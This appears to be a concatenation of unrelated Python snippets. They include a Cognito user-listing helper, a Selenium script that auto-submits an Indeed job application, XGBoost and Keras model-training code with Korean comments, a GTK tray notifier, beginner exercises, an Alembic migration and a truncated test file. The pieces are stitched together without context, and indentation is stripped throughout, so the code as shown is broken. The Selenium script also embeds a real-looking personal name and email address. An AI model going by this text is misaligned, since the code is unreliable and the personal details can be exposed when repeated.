# url(r'^admin/', include(admin.site.urls)),
)
|
def list_users(user_filter):
list_users_response = cognito_client.list_users(UserPoolId=COGNITO_USER_POOL_ID, Filter=user_filter)
users = list_users_response['Users']
while 'PaginationToken' in list_users_response:
list_users_response = cognito_client.list_users(UserPoolId=COGNITO_USER_POOL_ID, Filter=user_filter,
PaginationToken=list_users_response['PaginationToken'])
users += list_users_response['Users']
return users
|
from selenium import webdriver
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
'''
def get_web_driver(the_url):
browser = webdriver.Chrome('C:\chromedriver\chromedriver.exe')
browser.set_page_load_timeout("5")
browser.get(the_url)
return browser
'''
def answer_info(driver):
while not driver.find_element_by_xpath("//*[@id='form-action-submit']"):
questions = driver.find_elements_by_class_name("input")
for question in questions: # answer the questions
question.click()
# continue to next page
driver.find_element_by_xpath("//*[@id='form-action-continue']").click()
WebDriverWait(driver, 10).until(
EC.frame_to_be_available_and_switch_to_it(driver.find_element_by_xpath('//iframe')))
i_frame = driver.find_element_by_tag_name("iframe")
driver.switch_to.frame(i_frame)
driver.find_element_by_xpath("//*[@id='form-action-submit']").click()
user_first_name = "Xinyao"
user_last_name = "Zhang"
user_Email = "zhangxinyao88@gmail.com"
resume_rep = "D:\Resume:\Sample.txt"
job_page = "https://www.indeed.com/viewjob?jk=1715bbb95511d8be&from=serp&vjs=3"
driver = webdriver.Chrome('C:\chromedriver\chromedriver.exe')
driver.set_page_load_timeout("5")
driver.get(job_page)
driver.find_element_by_xpath("//*[@id='indeedApplyButtonContainer']").click() # find and click the apply button
# question = browser.find_element_by_xpath("//*[@id='label-input-applicant.firstName']")
# question = browser.find_element_by_id("label-input-applicant.fistName")
WebDriverWait(driver, 10).until(EC.frame_to_be_available_and_switch_to_it(driver.find_element_by_xpath('//iframe')))
# presence_of_element_located((By.XPATH, "/html/body/iframe")))
# popup = wait.until(EC.presence_of_element_located((By.CLASS_NAME, "indeed-apply-popup")))
i_frame = driver.find_element_by_tag_name("iframe")
# find_elements_by_xpath('//iframe')
driver.switch_to.frame(i_frame) # switch to the pop up window with name ( or first name, last name), email and resume
# name_field = driver.find_element_by_class_name("UserField-Name")
# names = name_field.find_elements_by_class_name("ia-TextInput")
# for name in names:
# check if the question is first name and last name or full name
first_name = driver.find_element_by_xpath("//*[@id='label-input-applicant.firstName']/label")
if first_name: # first + last name
first_name_space = driver.find_element_by_xpath("//*[@id='input-applicant.firstName']")
first_name_space.send_keys(user_first_name)
last_name = driver.find_element_by_xpath("//*[@id='label-input-applicant.lastName']/label")
if last_name:
last_name_space = driver.find_element_by_xpath("//*[@id='input-applicant.lastName']")
last_name_space.send_keys(user_last_name)
else:
name_space = driver.find_element_by_xpath("//*[@id='label-input-applicant.name']/label") # full name
name_space.send_keys(user_first_name + " " + user_last_name)
# Email
Email_space = driver.find_element_by_xpath("//*[@id='input-applicant.email']")
Email_space.send_keys(user_Email)
# Resume
resume_button = driver.find_element_by_xpath("//*[@id='ia-FilePicker-resume']")
resume_button.send_keys("C:/Users/zhang/Desktop/Sum.docx")
# Click continue button
driver.find_element_by_xpath("//*[@id='form-action-continue']").click()
WebDriverWait(driver, 10).until(EC.frame_to_be_available_and_switch_to_it(driver.find_element_by_tag_name("iframe")))
i_frame2 = driver.find_element_by_tag_name("iframe")
driver.switch_to.frame(i_frame2)
questions = driver.find_elements_by_class_name("input")
for question in questions: # answer the questions
print(question.text)
question.click()
driver.find_element_by_xpath("//*[@id='form-action-submit']").click()
# answer_info(driver)
|
# -*- coding:utf-8 -*-
import pandas as pd
import numpy as np
import xgboost as xgb
path = '/Users/chenhong/'
na_values = ['', 'NULL', 'null', 'NA', 'na', 'NaN', 'nan', '\\N']
## load data
feature_import='xgb_model/feature_importance_with_sort_feature_.txt'
train_pre_file='xgb_model/train_pred_with_sort_feature.txt'
valid_pre_file='xgb_model/valid_pred_with_sort_feature.txt'
model = 'xgb_model/card_with_sort_feature.model'
feature_file='/Users/chenhong/card_play_feature_add_sort_feature.csv'
feat_map_file = '/Users/chenhong/card_feat_map.txt'
xy_df = pd.read_table(feature_file, sep=',', na_values=na_values)
xy_df = xy_df.fillna(-999999)
## split train test oot dataset
print ("finish reading training data")
# shuffle and split train_set to train and valid set
idx = np.array([i for i in range(xy_df.shape[0])])
np.random.shuffle(idx)
xy_df.index = idx
samp_rate = 0.7
n_rcd = xy_df.shape[0]
valid_set = xy_df[xy_df.index.values > n_rcd * samp_rate]
train_set = xy_df[xy_df.index.values <= n_rcd * samp_rate]
## convert to DMatrix
print ("after shuffle the train and validate data")
cols_x = train_set.columns.values[1:]
print(cols_x)
train_data = train_set[cols_x].as_matrix()
train_label = train_set['label'].as_matrix()
dtrain = xgb.DMatrix(train_data, label = train_label)
valid_data = valid_set[cols_x].as_matrix()
valid_label = valid_set['label'].as_matrix()
dvalid = xgb.DMatrix(valid_data, label = valid_label)
## Train model
# parameter
param = {'max_depth': 3,
'learning_rate': 0.1,
'min_child_weight': 2,
'reg_alpha': 50,
'reg_lambda': 50,
'scale_pos_weight': 1,
'subsample': 0.9,
'colsample_bytree': 0.9,
'silent': True,
'objective': 'binary:logistic',
'nthread': 10,
'eval_metric': 'auc'}
evallist = [(dtrain, 'train'), (dvalid, 'valid')]
print ("try to train the modeling")
bst = xgb.train(param,
dtrain,
num_boost_round = 400,
evals = evallist)
# save model
bst.save_model(path + model)
# load model
bst = xgb.Booster()
bst.load_model(path + model)
# dump model with feature map
feat_map_df = pd.DataFrame({'id': [i for i in range(len(cols_x))]})
feat_map_df = feat_map_df.assign(feat_name = cols_x)
feat_map_df = feat_map_df.assign(type = ['q' for i in range(len(cols_x))])
feat_map_df.to_csv(feat_map_file, sep = '\t', header = False, index = False)
## predict
cols = ['label']
train_pred_df = train_set[cols]
train_pred_df['score'] = bst.predict(dtrain)
train_pred_df.to_csv(path+ train_pre_file, sep='\t', index=False)
valid_pred_df = valid_set[cols]
valid_pred_df['score'] = bst.predict(dvalid)
valid_pred_df.to_csv(path+ valid_pre_file, sep='\t', index=False)
## 计算AUC、KS
import sklearn.metrics as mtrs
# compute auc and ks
def compute_auc_ks(y_true, y_pred):
fpr, tpr, thresholds = mtrs.roc_curve(y_true, y_pred)
auc = mtrs.auc(fpr, tpr)
ks = (tpr - fpr).max()
return auc, ks
train = train_pred_df
valid = valid_pred_df
auc_train, ks_train = compute_auc_ks(train.label, train.score)
auc_valid, ks_valid = compute_auc_ks(valid.label, valid.score)
print([round(auc_train,3), round(auc_valid,3), round(ks_train,3), round(ks_valid,3)])
|
#!/usr/bin/env python
# | Copyright 2015-2016 Karlsruhe Institute of Technology
# |
# | Licensed under the Apache License, Version 2.0 (the "License");
# | you may not use this file except in compliance with the License.
# | You may obtain a copy of the License at
# |
# | http://www.apache.org/licenses/LICENSE-2.0
# |
# | Unless required by applicable law or agreed to in writing, software
# | distributed under the License is distributed on an "AS IS" BASIS,
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# | See the License for the specific language governing permissions and
# | limitations under the License.
from grid_control.gc_exceptions import UserError
from grid_control.utils.webservice import GridJSONRestClient
class DBS3LiteClient(object):
def __init__(self, url):
self._reader_url = '%s/%s' % (url, 'DBSReader')
self._writer_url = '%s/%s' % (url, 'DBSWriter')
self._migrate_url = '%s/%s' % (url, 'DBSMigrate')
self._gjrc = GridJSONRestClient(cert_error_msg = 'VOMS proxy needed to query DBS3!', cert_error_cls = UserError)
def listBlocks(self, **kwargs):
return self._gjrc.get(url=self._reader_url, api='blocks', params=kwargs)
def listFiles(self, **kwargs):
return self._gjrc.get(url=self._reader_url, api='files', params=kwargs)
def listFileParents(self, **kwargs):
return self._gjrc.get(url=self._reader_url, api='fileparents', params=kwargs)
def insertBulkBlock(self, data):
return self._gjrc.post(url=self._writer_url, api='bulkblocks', data=data)
def migrateSubmit(self, data):
return self._gjrc.post(url=self._migrate_url, api='submit', data=data)
def migrateStatus(self, **kwargs):
return self._gjrc.get(url=self._migrate_url, api='status', params=kwargs)
|
import os
import pandas as pd
from sklearn.model_selection import train_test_split
from tensorflow import keras
import numpy as np
os.chdir("C:/Users/Kyeongjun/Desktop/LG가전데이터")
"""------------------------------------------------------------------------------------------------------
### 1. calculating expected cooktime of 27 menus
------------------------------------------------------------------------------------------------------"""
## 1-1. 27개 메뉴 선택 & 가나다순 정렬
# 메뉴 선택 기준 : 100회 이상 요리된 메뉴 &10명 이상의 user(device)가 요리한 메뉴
oven = pd.read_csv('Oven_cooktimePred.csv', encoding='euc-kr')
menu = list(set(oven.Cook_menu)) # 27개
menu.sort()
## 1-2. menu별 expected cooktime 계산(mean, mode, median)
name, mean, mode, median = [], [], [], []
for i in range(27):
df = oven.loc[oven['Cook_menu'] == menu[i],['Cook_menu', 'Cookingtime']]
df1 = pd.DataFrame(df.Cookingtime.value_counts()).sort_index()
df1 = pd.DataFrame(list(zip(list(df1.index),list(df1.Cookingtime))), columns= ['time', 'count'])
m1 = round(sum(df1.iloc[:,0]*df1.iloc[:,1])/sum(df1.iloc[:,1]), 2)
m2 = df1.sort_values(by='count').iloc[len(df1)-1,0]
k = sum(df1['count'])/2
o = (k%2 == 0)
df0 = df.sort_values(by='Cookingtime')
df0 = df0.reset_index(drop=True)
if o :
m3 = (df0['Cookingtime'][round(k)] + df0['Cookingtime'][round(k)+1])/2
else :
m3 = df0['Cookingtime'][round(k)]
name.append(menu[i]); mean.append(m1); mode.append(m2); median.append(m3)
ex_cooktime = pd.DataFrame(list(zip(name,mean,mode,median)), columns = ['menu','mean','mode','median'])
del m1, m2, m3, df, df1, df0, k, o, mean, mode, median, name, i
ex_cooktime.to_csv('ex_cooktime.csv', header=True, index=False, encoding = 'euc-kr')
"""------------------------------------------------------------------------------------------------------
### 2. NN (user charicteristics + menu)
------------------------------------------------------------------------------------------------------"""
## 2-1. cooktime prediction용 DF 생성
oven_c = pd.read_csv('oven_clustering.csv') # user charicteristics df
oven = pd.read_csv('Oven_sample.csv', encoding = 'euc-kr')
oven['Cookingtime'] = oven['Cook_hour']*60*60 + oven['Cook_min']*60 + oven['Cook_sec'] # Cookingtime변수 생성 (시,분,초를 합산)
oven = oven.loc[oven['EVENT'] == '요리시작',:] # 요리 시작에 관한 데이터만 추출
oven = oven.loc[oven['Cook_menu'].isin(menu),] # 27개 메뉴에 관한 데이터만 추출
oven = oven.iloc[:,[2,6,12]] # DVICE_ID, Cook_menu, Cookingtime 변수만 선택
ctPred1 = pd.merge(oven_c,oven, left_on = 'DEVICE_ID', right_on = 'DEVICE_ID', how = 'inner')
ctPred1.columns = list(ctPred1.columns[:23]) +['Y']
# NN에 입력하기 위해 string으로 표현된 Cook_menu를 각각 0~26의 숫자로 대체합니다.
for i in range(len(ctPred1)) :
k = ctPred1.iloc[i,22]
num = menu.index(k)
ctPred1.iloc[i,22] = num
del k, num, i
ctPred1 = ctPred1.iloc[:,1:]
ctPred1.to_csv('ctPred1.csv', header=True, index=False)
del oven
## 2-2. NeuralNetwork modeling
# train_test_split
train, test = train_test_split(ctPred1, test_size = 0.2)
## make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1))) # 종속변수 Y를 제외한 변수 개수를 input size로 설정
NN.add(keras.layers.Dense(11, activation = "relu")) # hidden layer의 node 개수는 input변수의 개수와 output 변수의 개수의 중간 값으로 설정
NN.add(keras.layers.Dense(1, activation = None)) # output변수. 연속형이므로 activation function을 설정하지 않습니다.
Adam = keras.optimizers.Adam(learning_rate = 0.001) # optimizer는 Adam, learning_rate는 0.001
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse']) # mse를 기준으로 모델을 평가/학습합니다.
# model fitting & evaluation
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 30, batch_size=10) # batch_size = 10으로 설정하여 한번에 10개 row씩 학습됩니다.
# epochs = 30으로 설정하여 train set을 30번 학습시킵니다.
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1]) # test set에서의 성능을 확인입니다.
(600000**(1/2))/60 # 대략 +-12분정도의 차이를 보임
"""------------------------------------------------------------------------------------------------------
### 3. NN (user charicteristics + menu + accumulate/recent session variables)
------------------------------------------------------------------------------------------------------"""
## 3-1. 추가 변수 DF 생성
# 생성 변수 종류
# 동작 이전 : 메뉴 요리 횟수, 레인지 평균 요리 시간, 오븐 평균 요리 시간,
# 이전 세션 : 메뉴 요리 여부, 요리 시간
# 기타 : 현지 시간(시), 월
# 동작 이전 누적 변수 생성
oven_av = pd.read_csv('Oven_sample.csv', encoding = 'euc-kr')
oven_av['Cookingtime'] = oven_av['Cook_hour']*60*60 + oven_av['Cook_min']*60 + oven_av['Cook_sec']
oven_av = oven_av.loc[oven_av['EVENT'] == '요리시작',]
oven_av['Micro_t'], oven_av['Oven_t'], oven_av['MenuFreq'] = 0,0,0
df = pd.DataFrame()
for i in list(set(oven_av.DEVICE_ID)) :
df0 = oven_av.loc[oven_av['DEVICE_ID'] == i,:]
df0 = df0.sort_values(by='LOCAL_TIME')
for j in range(df0.shape[0]) :
df1 = df0.copy(deep=True)
df1 = df1.iloc[:j+1,:]
k = df1.loc[df1['Cook_Mode'].isin(['레인지', '레인지 자동']),'Cookingtime']
if len(k) != 0 :
df0.iloc[j,13] = sum(k)/len(k)
k = df1.loc[df1['Cook_Mode'].isin(['오븐', '오븐 자동']),'Cookingtime']
if len(k) != 0 :
df0.iloc[j,14] = sum(k)/len(k)
k = df1.loc[df1['Cook_menu'] == df0.iloc[j,6],'Cookingtime']
df0.iloc[j,15] = len(k)
df = df.append(df0)
oven_av = df.copy(deep=True)
del i, j, df0, df1, k, df
oven_av = oven_av.loc[oven_av['Cook_menu'].isin(menu),] # 27개 메뉴 데이터 추출
# 이전 세션 변수 생성 (1hour rule)
session = pd.read_csv('session.csv', encoding='euc-kr')
session['S1'], session['S2'] = 0, 0
for i in range(session.shape[0])[1:] :
s = session.loc[session['Session2'] == session.iloc[i,11]-1,:]
session.iloc[i,14] = sum(s['Cook_hour'])*60*60 + sum(s['Cook_min'])*60 + sum(s['Cook_sec'])
session.iloc[i,13] = 1 if (session.iloc[i,5] in list(s.Cook_menu)) else 0
session = session.loc[session['Cook_menu'].isin(menu),:] # 27개 메뉴 데이터 추출
del s, i,
# 기타 변수까지 포함한 DataFrame 생성
oven_av = oven_av.sort_values(by=['DEVICE_ID','LOCAL_TIME']) # DEVICE_ID, LOCAL_TIME으로 정렬한 뒤,
df0 = oven_av.iloc[:,[1,2,6,12,13,14,15]] # 변수 선택
df0 = df0.reset_index(drop=True) # session 변수와 합칠 때 index별로 concatenate 되지 않도록 index reset
session = session.sort_values(by=['DEVICE_ID','LOCAL_TIME']) # session 데이터도 위와 동일한 작업을 합니다.
df1 = session.iloc[:,[1,13,14]]
df1 = df1.reset_index(drop=True)
df = pd.concat([df0,df1.iloc[:,[1,2]]],axis=1) # 동작이전 누적 변수와 이전세션 변수 통합
ctPred2 = pd.merge(oven_c,df, left_on = 'DEVICE_ID', right_on = 'DEVICE_ID', how = 'inner') # 위 통합 데이터와 DEVICE_ID별 특징변수 통합
ctPred2 = ctPred2.sort_values(by=['DEVICE_ID','LOCAL_TIME']) # DEVICE_ID, LOCAL_TIME으로 정렬
ctPred2.to_csv('ctPred2_preprocessing.csv', header=True, index=False, encoding='euc-kr')
del df0, df1, df
# NN에 입력하기 위해 string으로 표현된 Cook_menu를 각각 0~26의 숫자로 대체합니다.
for i in range(len(ctPred2)) :
k = ctPred2.iloc[i,23]
num = menu.index(k)
ctPred2.iloc[i,23] = num
del k, num, i
ctPred2['time'], ctPred2['month'] = 0, 0
for i in range(len(ctPred2)) :
ctPred2.iloc[i,30] = int(ctPred2.iloc[i,22][11:13]) # time 변수 생성
ctPred2.iloc[i,31] = int(ctPred2.iloc[i,22][5:7]) # month 변수 생성
del i, ctPred2['LOCAL_TIME'], ctPred2['DEVICE_ID']
# column 순서 변경 (Cookingtime = Y 를 끝으로)
cols = ctPred2.columns.tolist()
cols = cols[:cols.index('Cookingtime')] + cols[cols.index('Cookingtime')+1:]
cols.append('Cookingtime')
ctPred2 = ctPred2[cols]
cols = ctPred2.columns.tolist()
cols[len(cols)-1] = 'Y'
ctPred2.columns = cols
del cols
ctPred2.to_csv('ctPred2.csv', header=True, index=False)
## 3-2. NeuralNetwork modeling 2
# train_test_split
train, test = train_test_split(ctPred2, test_size = 0.2)
## 3-3. make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu")) # hidden layer의 layer 개수는 2, node 개수는 input변수의 개수와 output 변수의 개수의 1/3, 1/3 지점으로 설정
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 70, batch_size=1)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
(400000**(1/2))/60 # 대략 +-10분정도의 차이를 보임
"""------------------------------------------------------------------------------------------------------
### 4. NN (user charicteristics + menu + accumulate/recent session variables + recent cooktime)
------------------------------------------------------------------------------------------------------"""
## 4-1. recent cooktime 변수 DF 생성
oven_rct = pd.read_csv('Oven_sample.csv', encoding='euc-kr')
oven_rct['Cookingtime'] = oven_rct['Cook_hour']*60*60 + oven_rct['Cook_min']*60 + oven_rct['Cook_sec']
oven_rct = oven_rct.loc[oven_rct['EVENT'] == '요리시작',]
oven_rct = oven_rct.loc[oven_rct['Cook_menu'].isin(menu),]
oven_rct['recent_ct'] = 0
df = pd.DataFrame()
for i in list(set(oven_rct.DEVICE_ID)) :
df0 = oven_rct.loc[oven_rct['DEVICE_ID'] == i,:]
df0 = df0.sort_values(by='LOCAL_TIME')
for j in range(1,df0.shape[0]) :
df1 = df0.copy(deep=True)
df2 = df1.iloc[:j,:]
k = list(df2.loc[df2['Cook_menu'] == df1.iloc[j,6],'Cookingtime']) if (df1.iloc[j,6] in list(set(df2['Cook_menu']))) else [0]
k = k[len(k)-1]
df0.iloc[j,13] = k
df = df.append(df0)
oven_rct = df.copy(deep=True)
oven_rct = oven_rct.reset_index(drop=True)
del i, j, df0, df1, k, df, df2
df = pd.read_csv('ctPred3_preprocessing.csv', encoding='euc-kr')
df = pd.concat([df,oven_rct.iloc[:,-1]],axis=1)
ctPred3 = pd.merge(oven_c,df, left_on = 'DEVICE_ID', right_on = 'DEVICE_ID', how = 'inner')
ctPred3 = ctPred3.sort_values(by=['DEVICE_ID','LOCAL_TIME'])
# menu를 가나다순으로 0-27까지 레이블링
for i in range(len(ctPred3.iloc[:,0])) :
k = ctPred3.iloc[i,23]
num = menu.index(k)
ctPred3.iloc[i,23] = num
del k, num, i
ctPred3['time'] = 0
for i in range(len(ctPred3.iloc[:,0])) :
ctPred3.iloc[i,31] = int(ctPred3.iloc[i,22][11:13]) # time 변수 생성
del i
del ctPred3['LOCAL_TIME'], ctPred3['DEVICE_ID']
# column 순서 변경 (Cookingtime = Y 를 끝으로)
cols = ctPred3.columns.tolist()
cols = cols[:cols.index('Cookingtime')] + cols[cols.index('Cookingtime')+1:]
cols.append('Cookingtime')
ctPred3 = ctPred3[cols]
cols = ctPred3.columns.tolist()
cols[len(cols)-1] = 'Y'
ctPred3.columns = cols
del cols
ctPred3.to_csv('ctPred3.csv', header=True, index=False)
## 4-2. NeuralNet modeling3
ctPred3 = pd.read_csv('ctPred3.csv')
# train_test_split
train, test = train_test_split(ctPred3, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu"))
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 800, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
(320000**(1/2))/60 # 대략 +-10분정도의 차이를 보임
"""--------------------------------------------------------------------------------------------------------------------
### 5. NN by selected variables (selected user charicteristics + accumulate/recent session variables + recent cooktime)
--------------------------------------------------------------------------------------------------------------------"""
ctPred4 = ctPred3.iloc[:,[1,2,3,4,5,16,20,21,22,23,24,25,26,27,28,29]]
# train_test_split
train, test = train_test_split(ctPred4, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(7, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 150, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
(600000**(1/2))/60 # 대략 +-12분정도의 차이를 보임
"""------------------------------------------------------------------------------------------------------
### 6. NN by menu (user charicteristics + accumulate/recent session variables + recent cooktime)
------------------------------------------------------------------------------------------------------"""
## 6-1. 요리횟수가 첫번째로 많은 메뉴(군고구마)
ctPred5_7 = ctPred3.loc[ctPred3['Cook_menu'] == 7, ctPred3.columns != 'Cook_menu']
# train_test_split
train, test = train_test_split(ctPred5_7, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu"))
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 300, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
## 6-2. 요리횟수가 두번째로 많은 메뉴(냉동밥데우기)
ctPred5_12 = ctPred3.loc[ctPred3['Cook_menu'] == 12, ctPred3.columns != 'Cook_menu']
# train_test_split
train, test = train_test_split(ctPred5_12, test_size = 0.2)
# make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu"))
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 100, batch_size=10)
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1])
"""------------------------------------------------------------------------------------------------------
### 7. mse of naive rule
------------------------------------------------------------------------------------------------------"""
# 이전에 해당 메뉴를 요리한 경험이 있으면 이전 설정시간을,
# 아니면 해당 메뉴의 expected cooktime을 추천하는 방식
## 7-1. 모든 메뉴에 대한 naive rule 적용
(np.mean((ctPred3['Y'] - ctPred3['recent_ct'])**(2)))**(1/2)/60
# naive한 방식으로 모든 메뉴를 예측하면 22분정도 오차
## 7-2. 개별 메뉴에 대한 naive rule 적용
# 군고구마
df = ctPred5_7.copy(deep=True)
df.loc[df['recent_ct'] == 0,'recent_ct'] = 1725.72
np.mean((df.Y-df.recent_ct)**2)/60
# 냉동밥데우기
df = ctPred5_12.copy(deep=True)
df.loc[df['recent_ct'] == 0,'recent_ct'] = 186.44
np.mean((df.Y-df.recent_ct)**2)/60
# naive한 방식으로 예측하면 23분, 15분정도 오차 |
#!/usr/bin/env python
#
# System tray notifier for sboui updates. Source code adapted from
# salix-update-notifier by George Vlahavas (gapan).
import gtk
import sys
def accept(data=None):
sys.exit(0)
def dismiss(data=None):
sys.exit(1)
def quit(data=None):
sys.exit(2)
def make_menu(event_button, event_time, data=None):
menu = gtk.Menu()
accept_image = gtk.Image()
accept_image.set_from_icon_name('system-run', gtk.ICON_SIZE_MENU)
accept_item = gtk.ImageMenuItem('Launch sboui updater')
accept_item.set_image(accept_image)
dismiss_image = gtk.Image()
dismiss_image.set_from_icon_name('window-close', gtk.ICON_SIZE_MENU)
dismiss_item = gtk.ImageMenuItem('Ignore for now')
dismiss_item.set_image(dismiss_image)
quit_image = gtk.Image()
quit_image.set_from_icon_name('application-exit', gtk.ICON_SIZE_MENU)
quit_item = gtk.ImageMenuItem('Don\'t remind me again')
quit_item.set_image(quit_image)
menu.append(accept_item)
menu.append(dismiss_item)
menu.append(quit_item)
accept_item.connect_object("activate", accept, "Accept")
accept_item.show()
dismiss_item.connect_object("activate", dismiss, "Dismiss")
dismiss_item.show()
quit_item.connect_object("activate", quit, "Quit")
quit_item.show()
menu.popup(None, None, None, event_button, event_time)
def on_right_click(data, event_button, event_time):
make_menu(event_button, event_time)
def on_left_click(event):
accept()
if __name__ == '__main__':
icon = gtk.status_icon_new_from_icon_name("sboui")
icon.set_tooltip_text('SBo updates are available')
icon.connect('popup-menu', on_right_click)
icon.connect('activate', on_left_click)
gtk.main()
|
count = 0
while count < 5:
count = count+1
if count is 4:
break
print("count")
# With continue statement
count = 0
while count < 5:
count = count+1
if count is 4:
continue
print("count")
|
"""Add ix_test_start_time_status_lower
Revision ID: 9c00de5646cd
Revises: d5e936a5835e
Create Date: 2017-08-01 14:25:16.846453
"""
# revision identifiers, used by Alembic.
revision = '9c00de5646cd'
down_revision = 'd5e936a5835e'
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_index('ix_test_start_time_status_lower', 'test', [sa.text('start_time DESC'), sa.text('lower(status::text)')], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index('ix_test_start_time_status_lower')
# ### end Alembic commands ###
|
# For the exercise, look up the methods and functions that are available for use
# with Python lists.
x = [1, 2, 3]
y = [8, 9, 10]
# For the following, DO NOT USE AN ASSIGNMENT (=).
# Change x so that it is [1, 2, 3, 4]
# YOUR CODE HERE
print(x.append(4))
# Using y, change x so that it is [1, 2, 3, 4, 8, 9, 10]
# YOUR CODE HERE
# print(x.extend([8,9,10]))
print(x.extend(y))
# Change x so that it is [1, 2, 3, 4, 9, 10]
# YOUR CODE HERE
print(x.pop(4))
# pop removes at the index of element
# print(x.remove(8))
# remove removes takes actual value as input to be removed
# Change x so that it is [1, 2, 3, 4, 9, 99, 10]
# YOUR CODE HERE
print(x.extend([99,10]))
# Print the length of list x
# YOUR CODE HERE
print(len(x))
# Print all the values in x multiplied by 1000
# YOUR CODE HERE
newlist = []
for i in x:
newlist.append(i*1000)
print newlist
# x[:] = [item * 1000 for item in x]
# list comprehension does multiplication in place
# print(x) |
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--fasta', type=str)
parser.add_argument('--start', type=int)
parser.add_argument('--end', type=int)
args = parser.parse_args()
# finds Chi-sites coordinates for + and - strands for a given interval
with open(args.fasta, 'r', encoding='utf-8') as inp:
data = str()
for line in inp:
if not line.startswith('>'):
data += line.strip()
genome_subset = data[args.start:args.end]
plus_strand = [n+args.start for n in range(len(genome_subset)) if genome_subset.find("GCTGGTGG", n) == n]
minus_strand = [n+args.start for n in range(len(genome_subset)) if genome_subset.find("CCACCAGC", n) == n]
with open('plus_chi.tsv', 'w') as out:
for i in plus_strand:
out.write(f'{i}\t{i+8}\n')
with open('minus_chi.tsv', 'w') as out:
for i in minus_strand:
out.write(f'{i}\t{i+8}\n')
|
# -*- coding: utf-8 -*-
import pandas as pd
import pytest
from kartothek.core.cube.constants import KTK_CUBE_UUID_SEPERATOR
from kartothek.core.cube.cube import Cube
from kartothek.io.eager_cube import build_cube, copy_cube
__all__ = (
"test_additional_files",
"test_delete_by_correct_uuid",
"test_fail_blocksize_negative",
"test_fail_blocksize_wrong_type",
"test_fail_blocksize_zero",
"test_fails_no_store_factory",
"test_missing_cube_files",
"test_missing_metadata",
"test_missing_seed_dataset",
"test_noop",
"test_overwrite_check_with_copy",
)
def test_delete_by_correct_uuid(driver, function_store):
df_seed = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
)
df_enrich = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
)
cube_foo = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="foo")
build_cube(
data={cube_foo.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube_foo,
store=function_store,
)
cube_foo_bar = Cube(
dimension_columns=["x"], partition_columns=["p"], uuid_prefix="foo_bar"
)
build_cube(
data={cube_foo_bar.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube_foo_bar,
store=function_store,
)
store = function_store()
foo_bar_keys = {k for k in store.keys() if "foo_bar" in k}
store.delete("foo++seed.by-dataset-metadata.json")
store.delete("foo++enrich.by-dataset-metadata.json")
driver(cube=cube_foo, store=function_store)
assert foo_bar_keys == set(store.keys())
def test_missing_seed_dataset(driver, function_store):
df_seed = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]}
)
df_enrich = pd.DataFrame(
{"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]}
)
cube = Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
)
store = function_store()
seed_keys = {k for k in store.keys() if "cube++seed" in k and "/" in k}
